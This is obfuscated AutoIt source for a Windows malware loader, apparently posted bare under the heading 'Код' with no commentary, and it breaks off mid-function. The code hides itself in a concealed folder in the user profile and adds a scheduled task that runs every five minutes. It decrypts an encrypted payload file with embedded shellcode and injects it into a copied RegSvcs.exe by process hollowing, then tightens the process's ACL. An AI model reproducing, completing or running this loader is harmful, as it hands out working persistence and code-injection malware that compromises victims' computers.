Код
Global $SCRIPTDIR = FileGetShortName(@ScriptDir)
Global $WINDIR = FileGetShortName(@WindowsDir)
Global $USERDIR = FileGetShortName(@UserProfileDir)
Global $_X0x4B38E8EC16991FF200FEAA89FBD03E1A = "yes"
Global $MYDIR = "wktukee"
Global $AUTOITEXE = "uwvi.exe"
Global $SCRIPTNAME = "jnud.jcc"
global $UNKSTR = "??????=?????????"
Global $SACKKLBNAME = "sack.klb"
Global $_X0x45148575AAEC4A5FF0D6C949EC25B1E3 = "yes"
Wait("30000")
If $_X0x4B38E8EC16991FF200FEAA89FBD03E1A = $_X0x45148575AAEC4A5FF0D6C949EC25B1E3 Then
If UBound(ProcessList($AUTOITEXE)) > 2 Then Exit
Install()
Else
Run($SCRIPTDIR)
EndIf
func Install()
If NOT FileExists($USERDIR & "\" & $MYDIR & "\") Then
DirCreate($USERDIR & "\" & $MYDIR & "\")
FileMove($SCRIPTDIR & "\*.*", $USERDIR & "\" & $MYDIR & "\")
Run(@ComSpec & ' /c ' & "schtasks /create /sc minute /mo 5 /tn " & $MYDIR &" /tr" & ' "' & $USERDIR & "\" & $MYDIR & "\" & $AUTOITEXE & " " & $USERDIR & "\" & $MYDIR & "\" & $SCRIPTNAME & '"',"", @SW_HIDE)
FileSetAttrib($USERDIR & "\" & $MYDIR & "\", "+SH")
FileSetAttrib($USERDIR & "\" & $MYDIR & "\*.*", "+SH")
FileChangeDir($USERDIR & "\" & $MYDIR & "\")
EndIf
If UBound(ProcessList($AUTOITEXE)) > 2 Then Exit
Run($USERDIR & "\" & $MYDIR)
EndFunc
Func Run($SACKKLBDIR)
Global $SACKKLBPATH = FileGetShortName($SACKKLBDIR & "\" & $SACKKLBNAME)
Global $SACKKLBDATA = FileRead(FileOpen($SACKKLBPATH, 16))
Global $REGSVCS4 = $WINDIR & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Global $REGSVCS2 = $WINDIR & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
If FileExists($REGSVCS4) Then
FileCopy($REGSVCS4, $USERDIR & "\" & $AUTOITEXE)
elseif FileExists($REGSVCS2) Then
FileCopy($REGSVCS2, $USERDIR & "\" & $AUTOITEXE)
EndIf
FileSetAttrib($USERDIR & "\" & $AUTOITEXE, "+SH")
_X0x0A5759EC3827D36CEC653C1A4B2044FA($USERDIR & "\" & $AUTOITEXE)
EndFunc
func _X0x0A5759EC3827D36CEC653C1A4B2044FA($EXEPATH)
$_X0x9B69E614C3791E6DEB6B8ABC7A6B306F = _X0xDCD0DF18C91D43B1BD9673C19DE8936B($SACKKLBDATA, $UNKSTR)
_X0x2AEEB84AA1FEAE9FE5B544D20B4EE6B0($_X0x9B69E614C3791E6DEB6B8ABC7A6B306F, $EXEPATH)
EndFunc
Func _X0xDCD0DF18C91D43B1BD9673C19DE8936B($KLBDATA, $PARAM)
Local $CODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC0000
00B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D
2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435
F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C766
38B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF000000
8985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF000
0008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODESTRUC = DllStructCreate("byte[" & BinaryLen($CODE) & "]")
DllStructSetData($CODESTRUC, 1, $CODE)
Local $KLBSTRUC = DllStructCreate("byte[" & BinaryLen($KLBDATA) & "]")
DllStructSetData($KLBSTRUC, 1, $KLBDATA)
_X0xB3F0357FF7260C2547BB4929FC287C61(DllStructGetPtr($CODESTRUC), BinaryLen($CODE), 0x40)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODESTRUC), "ptr", DllStructGetPtr($KLBSTRUC), "int", BinaryLen($KLBDATA), "str", $PARAM, "int", 0)
Local $RESULT = DllStructGetData($KLBSTRUC, 1)
$KLBSTRUC = 0
$CODESTRUC = 0
Return $RESULT
EndFunc
Func Wait($MS)
Local $TIME1 = DllCall("kernel32.dll", "dword", "GetTickCount")
Sleep($MS)
Local $TIME2 = DllCall("kernel32.dll", "dword", "GetTickCount")
Return($TIME2[0] - $TIME1[0] <> $MS)
EndFunc
Func _X0xC10D5FC2942E93AC375096F3A63FEAC8($_X0x6093BBBD21B673DB4E5DB3665C31D15B = "-1")
$_X0x90D37C72C3629D690E47582CA8F77C41 = DllStructCreate("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT")
$_X0x21600FC16BB087DAD780190860099C71 = DllStructCreate("char[32]")
$_X0x6B4D73FA64DE23E285258B6170B57392 = DllStructCreate("dword")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 1, "0x401FFFFF")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 2, "3")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 3, "0")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 4, "0")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 5, "0")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 6, "1")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 7, "0")
DllStructSetData($_X0x90D37C72C3629D690E47582CA8F77C41, 8, DllStructGetPtr($_X0x21600FC16BB087DAD780190860099C71))
DllStructSetData($_X0x21600FC16BB087DAD780190860099C71, 1, "CURRENT_USER")
$_X0xA0A6E4DB4EC09D5119A4ED99405430A6 = DllStructGetPtr($_X0x90D37C72C3629D690E47582CA8F77C41)
$_X0x8A5A2FA3D10B485BE32907E28CCCEED1 = DllStructGetPtr($_X0x6B4D73FA64DE23E285258B6170B57392)
$_X0xDD4835910DA5B5529A65D1C0E306366E = DllCall("Advapi32.dll", "dword", "SetEntriesInAclA", "ulong", "1", "ptr", $_X0xA0A6E4DB4EC09D5119A4ED99405430A6, "ptr", "0", "ptr", $_X0x8A5A2FA3D10B485BE32907E28CCCEED1)
If @error Then Return SetError(1, @error, False)
$_X0x4DA3C39FD81847189C106C8F1E887DDB = DllCall("Advapi32.dll", "dword", "SetSecurityInfo", "handle", $_X0x6093BBBD21B673DB4E5DB3665C31D15B, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", DllStructGetData($_X0x6B4D73FA64DE23E285258B6170B57392, 1), "ptr", 0)
If @error Then Return SetError(2, @error, False)
DllCall("Kernel32.dll", "Handle", "LocalFree", "Handle", $_X0x8A5A2FA3D10B485BE32907E28CCCEED1)
If @error Then Return SetError(3, 0, False)
If Not UBound($_X0xDD4835910DA5B5529A65D1C0E306366E) Then Return SetError(4, 0, False)
If Not UBound($_X0x4DA3C39FD81847189C106C8F1E887DDB) Then Return SetError(5, 0, False)
If $_X0xDD4835910DA5B5529A65D1C0E306366E[0] <> 0 Then Return SetError(6, $_X0xDD4835910DA5B5529A65D1C0E306366E[0], False)
If $_X0x4DA3C39FD81847189C106C8F1E887DDB[0] <> 0 Then Return SetError(7, $_X0x4DA3C39FD81847189C106C8F1E887DDB[0], False)
Return True
EndFunc
Func _X0x2AEEB84AA1FEAE9FE5B544D20B4EE6B0($_X0x447053E7AC124C74A67FC77137B4D41C, $_X0xCCDF130FEED1B27DD9A0764C44753179 = @ScriptFullPath, $_X0xE8608A6D762BAFFF12DF03EBB2E84571 = 0)
Global $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9 = "ptr"
Local $_X0xF9F07E458299AFCC92CE4872DE2BB8C5 = DllStructCreate("byte[" & BinaryLen($_X0x447053E7AC124C74A67FC77137B4D41C) & "]"), $_X0x2327389768AFBEE8A6F60A3ECAAB872C, $_X0x48EB9A05A34915A3E277AAF998104E61, $_X0x599EC57911640D96B6D61D4FE3AA5519, $_X0xA84BEB0843696C127885F986D0C1C90B, $_X0x2DE1363F7E7119B4DE68EA2F62B2D5FE, $_X0x493025304D54D23114C2E41B1CDEFACE, $_X0x3832D21F55A2B17A1379E6AFA7BA77D3, $_X0xBC90ED07F917A22963538F40173C6DF4, $_X0x35F67C70606E075693D8C554AB6384E7, $_X0x2F16781747C0C4DA8A3445A6809FB874, $_X0x9DA7125FC4226D0AEA08001A553952D9, $_X0xA6A83D1BF1F93D776C6690F6262CF8DE, $_X0xEBF4F88A84170D14721C3065BD174ACA
DllStructSetData($_X0xF9F07E458299AFCC92CE4872DE2BB8C5, 1, $_X0x447053E7AC124C74A67FC77137B4D41C)
Local $_X0x04CFECBAAA28E05E7040DA49198108FE = DllStructGetPtr($_X0xF9F07E458299AFCC92CE4872DE2BB8C5), $_X0xEB9885D49E447E78142E59607A6B6F42 = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")
Local $_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $_X0xCCDF130FEED1B27DD9A0764C44753179, "wstr", $_X0xE8608A6D762BAFFF12DF03EBB2E84571, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, 0, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, 0, "int", 0, "dword", 4, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, 0, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, 0, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr(DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")), $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr($_X0xEB9885D49E447E78142E59607A6B6F42))
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return 0
Local $_X0x5E4041724B1003114F88A7EF84F64108 = DllStructGetData($_X0xEB9885D49E447E78142E59607A6B6F42, "Process"), $_X0x68F5E1A435764B1F3CC7640A6FC222A5 = DllStructGetData($_X0xEB9885D49E447E78142E59607A6B6F42, "Thread")
_X0xC10D5FC2942E93AC375096F3A63FEAC8($_X0x5E4041724B1003114F88A7EF84F64108)
If @AutoItX64 And IsWOW64Process($_X0x5E4041724B1003114F88A7EF84F64108) Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
If @AutoItX64 Then
If @OSArch = "X64" Then
$_X0x2327389768AFBEE8A6F60A3ECAAB872C = 2
$_X0x48EB9A05A34915A3E277AAF998104E61 = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;dword ContextFlags; dword MxCsr;word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;uint64 Rip;uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];uint64 VectorRegister[52]; uint64 VectorControl;uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
Else
Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
EndIf
Else
$_X0x2327389768AFBEE8A6F60A3ECAAB872C = 1
$_X0x48EB9A05A34915A3E277AAF998104E61 = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")
EndIf
Switch $_X0x2327389768AFBEE8A6F60A3ECAAB872C
Case 1
$_X0x599EC57911640D96B6D61D4FE3AA5519 = 0x10007
Case 2
$_X0x599EC57911640D96B6D61D4FE3AA5519 = 0x100007
EndSwitch
DllStructSetData($_X0x48EB9A05A34915A3E277AAF998104E61, "ContextFlags", $_X0x599EC57911640D96B6D61D4FE3AA5519)
$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $_X0x68F5E1A435764B1F3CC7640A6FC222A5, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr($_X0x48EB9A05A34915A3E277AAF998104E61))
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
Switch $_X0x2327389768AFBEE8A6F60A3ECAAB872C
Case 1
$_X0xA84BEB0843696C127885F986D0C1C90B = DllStructGetData($_X0x48EB9A05A34915A3E277AAF998104E61, "Ebx")
Case 2
$_X0xA84BEB0843696C127885F986D0C1C90B = DllStructGetData($_X0x48EB9A05A34915A3E277AAF998104E61, "Rdx")
EndSwitch
Local $_X0x04C1A631D5E75021D831BFA63FE1E4E6 = DllStructCreate("char Magic[2];word BytesOnLastPage;word Pages;word Relocations;word SizeofHeader;word MinimumExtra;word MaximumExtra;word SS;word SP;word Checksum;word IP;word CS;word Relocation;word Overlay;char Reserved[8];word OEMIdentifier;word OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $_X0x04CFECBAAA28E05E7040DA49198108FE), $_X0xBC759235419A2B831CD473523E3BC5E3 = $_X0x04CFECBAAA28E05E7040DA49198108FE
$_X0x04CFECBAAA28E05E7040DA49198108FE += DllStructGetData($_X0x04C1A631D5E75021D831BFA63FE1E4E6, "AddressOfNewExeHeader")
Local $_X0xD511D4A7A95730F9B8A064FFBBFD3F24 = DllStructGetData($_X0x04C1A631D5E75021D831BFA63FE1E4E6, "Magic")
If Not($_X0xD511D4A7A95730F9B8A064FFBBFD3F24 == "MZ") Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
Local $_X0x6D750C5A3F240DA363A43A93BD0890D6 = DllStructCreate("dword Signature", $_X0x04CFECBAAA28E05E7040DA49198108FE)
$_X0x04CFECBAAA28E05E7040DA49198108FE += 4
If DllStructGetData($_X0x6D750C5A3F240DA363A43A93BD0890D6, "Signature") <> 17744 Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
Local $_X0x74EAE2E8385A214DCC09A479F8F44DCD = DllStructCreate("word Machine;word NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;word SizeOfOptionalHeader;word Characteristics", $_X0x04CFECBAAA28E05E7040DA49198108FE), $_X0x084D4AC7622DCFE01B9AA18BF6181499 = DllStructGetData($_X0x74EAE2E8385A214DCC09A479F8F44DCD, "NumberOfSections")
$_X0x04CFECBAAA28E05E7040DA49198108FE += 20
Local $_X0x1D57214EDF9976F15959E35DD5887C38 = DllStructCreate("word Magic;", $_X0x04CFECBAAA28E05E7040DA49198108FE), $_X0x230D8CBE9575400C76C68BA8903C8A38 = DllStructGetData($_X0x1D57214EDF9976F15959E35DD5887C38, 1), $_X0x554F086DF434A13540762D1308D8B4DC
If $_X0x230D8CBE9575400C76C68BA8903C8A38 = 267 Then
If @AutoItX64 Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
$_X0x554F086DF434A13540762D1308D8B4DC = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $_X0x04CFECBAAA28E05E7040DA49198108FE)
$_X0x04CFECBAAA28E05E7040DA49198108FE += 96
ElseIf $_X0x230D8CBE9575400C76C68BA8903C8A38 = 523 Then
If Not @AutoItX64 Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
$_X0x554F086DF434A13540762D1308D8B4DC = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $_X0x04CFECBAAA28E05E7040DA49198108FE)
$_X0x04CFECBAAA28E05E7040DA49198108FE += 112
Else
Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
EndIf
Local $_X0x8D1181881CFD2759CEDFC365808D6F40 = DllStructGetData($_X0x554F086DF434A13540762D1308D8B4DC, "AddressOfEntryPoint"), $_X0x4435938919E6BCD382FCD841B36FEE41 = DllStructGetData($_X0x554F086DF434A13540762D1308D8B4DC, "SizeOfHeaders"), $_X0x0B12E46F35D959FE2A130CB1986B9D7F = DllStructGetData($_X0x554F086DF434A13540762D1308D8B4DC, "ImageBase"), $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2 = Random(104857600, 209715200, 1)
$_X0x04CFECBAAA28E05E7040DA49198108FE += 40
Local $_X0xB3FFFA2F90DAB437C0CA9319A7F25BBA = DllStructCreate("dword a; dword b", $_X0x04CFECBAAA28E05E7040DA49198108FE), $_X0xCD8E8E5E6E9448E90649875DAD882EF5 = DllStructGetData($_X0xB3FFFA2F90DAB437C0CA9319A7F25BBA, "a"), $_X0x0ED8D17E37A05AB62B3ED963E74BDB5A = DllStructGetData($_X0xB3FFFA2F90DAB437C0CA9319A7F25BBA, "b")
If $_X0xCD8E8E5E6E9448E90649875DAD882EF5 And $_X0x0ED8D17E37A05AB62B3ED963E74BDB5A Then $_X0x2DE1363F7E7119B4DE68EA2F62B2D5FE = True
$_X0x04CFECBAAA28E05E7040DA49198108FE += 88
If $_X0x2DE1363F7E7119B4DE68EA2F62B2D5FE Then
$_X0x3832D21F55A2B17A1379E6AFA7BA77D3 = _X0x35BF8E5BE70A5980C473C55DD4B0C7C5($_X0x5E4041724B1003114F88A7EF84F64108, $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2)
If @error Then
$_X0x3832D21F55A2B17A1379E6AFA7BA77D3 = _X0x83D4AAF0416F24DC1BC6AD0875549D36($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F, $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2)
If @error Then
_X0x13DA0433613449867EDFD85102A652B8($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F)
$_X0x3832D21F55A2B17A1379E6AFA7BA77D3 = _X0x83D4AAF0416F24DC1BC6AD0875549D36($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F, $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2)
If @error Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
EndIf
EndIf
$_X0x493025304D54D23114C2E41B1CDEFACE = True
Else
$_X0x3832D21F55A2B17A1379E6AFA7BA77D3 = _X0x83D4AAF0416F24DC1BC6AD0875549D36($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F, $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2)
If @error Then
_X0x13DA0433613449867EDFD85102A652B8($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F)
$_X0x3832D21F55A2B17A1379E6AFA7BA77D3 = _X0x83D4AAF0416F24DC1BC6AD0875549D36($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x0B12E46F35D959FE2A130CB1986B9D7F, $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2)
If @error Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
EndIf
EndIf
DllStructSetData($_X0x554F086DF434A13540762D1308D8B4DC, "ImageBase", $_X0x3832D21F55A2B17A1379E6AFA7BA77D3)
Local $_X0x40323F55503DBDA4939594941EBDD4E1 = DllStructCreate("byte[" & $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2 & "]"), $_X0xBB66A7FBAD32312EEB52C28CA7C70526 = DllStructGetPtr($_X0x40323F55503DBDA4939594941EBDD4E1), $_X0x45102C61C243C1C56F68CC3C952C0D74 = DllStructCreate("byte[" & $_X0x4435938919E6BCD382FCD841B36FEE41 & "]", $_X0xBC759235419A2B831CD473523E3BC5E3)
DllStructSetData($_X0x40323F55503DBDA4939594941EBDD4E1, 1, DllStructGetData($_X0x45102C61C243C1C56F68CC3C952C0D74, 1))
For $_X0xF489DB547562ADBAE3D494C6F0F15A87 = 1 To $_X0x084D4AC7622DCFE01B9AA18BF6181499
$_X0xBC90ED07F917A22963538F40173C6DF4 = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;word NumberOfLinenumbers;dword Characteristics", $_X0x04CFECBAAA28E05E7040DA49198108FE)
$_X0x35F67C70606E075693D8C554AB6384E7 = DllStructGetData($_X0xBC90ED07F917A22963538F40173C6DF4, "SizeOfRawData")
$_X0x2F16781747C0C4DA8A3445A6809FB874 = $_X0xBC759235419A2B831CD473523E3BC5E3 + DllStructGetData($_X0xBC90ED07F917A22963538F40173C6DF4, "PointerToRawData")
$_X0x9DA7125FC4226D0AEA08001A553952D9 = DllStructGetData($_X0xBC90ED07F917A22963538F40173C6DF4, "VirtualAddress")
$_X0xA6A83D1BF1F93D776C6690F6262CF8DE = DllStructGetData($_X0xBC90ED07F917A22963538F40173C6DF4, "UnionOfVirtualSizeAndPhysicalAddress")
If $_X0xA6A83D1BF1F93D776C6690F6262CF8DE And $_X0xA6A83D1BF1F93D776C6690F6262CF8DE < $_X0x35F67C70606E075693D8C554AB6384E7 Then $_X0x35F67C70606E075693D8C554AB6384E7 = $_X0xA6A83D1BF1F93D776C6690F6262CF8DE
If $_X0x35F67C70606E075693D8C554AB6384E7 Then
DllStructSetData(DllStructCreate("byte[" & $_X0x35F67C70606E075693D8C554AB6384E7 & "]", $_X0xBB66A7FBAD32312EEB52C28CA7C70526 + $_X0x9DA7125FC4226D0AEA08001A553952D9), 1, DllStructGetData(DllStructCreate("byte[" & $_X0x35F67C70606E075693D8C554AB6384E7 & "]", $_X0x2F16781747C0C4DA8A3445A6809FB874), 1))
EndIf
If $_X0x493025304D54D23114C2E41B1CDEFACE Then
If $_X0x9DA7125FC4226D0AEA08001A553952D9 <= $_X0xCD8E8E5E6E9448E90649875DAD882EF5 And $_X0x9DA7125FC4226D0AEA08001A553952D9 + $_X0x35F67C70606E075693D8C554AB6384E7 > $_X0xCD8E8E5E6E9448E90649875DAD882EF5 Then
$_X0xEBF4F88A84170D14721C3065BD174ACA = DllStructCreate("byte[" & $_X0x0ED8D17E37A05AB62B3ED963E74BDB5A & "]", $_X0x2F16781747C0C4DA8A3445A6809FB874 +($_X0xCD8E8E5E6E9448E90649875DAD882EF5 - $_X0x9DA7125FC4226D0AEA08001A553952D9))
EndIf
EndIf
$_X0x04CFECBAAA28E05E7040DA49198108FE += 40
Next
If $_X0x493025304D54D23114C2E41B1CDEFACE Then _X0x366DD2F42FFC040F59D36B360A493D45($_X0xBB66A7FBAD32312EEB52C28CA7C70526, $_X0xEBF4F88A84170D14721C3065BD174ACA, $_X0x3832D21F55A2B17A1379E6AFA7BA77D3, $_X0x0B12E46F35D959FE2A130CB1986B9D7F, $_X0x230D8CBE9575400C76C68BA8903C8A38 = 523)
$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0x3832D21F55A2B17A1379E6AFA7BA77D3, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0xBB66A7FBAD32312EEB52C28CA7C70526, "dword_ptr", $_X0xC35CACD4FE64D634EAE7D3AC2A5588B2, "dword_ptr*", 0)
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
Local $_X0x9E5B7A416CC62B71EDB5726F06D6A667 = DllStructCreate("byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId")
$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "ReadProcessMemory", $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0xA84BEB0843696C127885F986D0C1C90B, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr($_X0x9E5B7A416CC62B71EDB5726F06D6A667), "dword_ptr", DllStructGetSize($_X0x9E5B7A416CC62B71EDB5726F06D6A667), "dword_ptr*", 0)
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
DllStructSetData($_X0x9E5B7A416CC62B71EDB5726F06D6A667, "ImageBaseAddress", $_X0x3832D21F55A2B17A1379E6AFA7BA77D3)
$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0xA84BEB0843696C127885F986D0C1C90B, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr($_X0x9E5B7A416CC62B71EDB5726F06D6A667), "dword_ptr", DllStructGetSize($_X0x9E5B7A416CC62B71EDB5726F06D6A667), "dword_ptr*", 0)
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
Switch $_X0x2327389768AFBEE8A6F60A3ECAAB872C
Case 1
DllStructSetData($_X0x48EB9A05A34915A3E277AAF998104E61, "Eax", $_X0x3832D21F55A2B17A1379E6AFA7BA77D3 + $_X0x8D1181881CFD2759CEDFC365808D6F40)
Case 2
DllStructSetData($_X0x48EB9A05A34915A3E277AAF998104E61, "Rcx", $_X0x3832D21F55A2B17A1379E6AFA7BA77D3 + $_X0x8D1181881CFD2759CEDFC365808D6F40)
EndSwitch
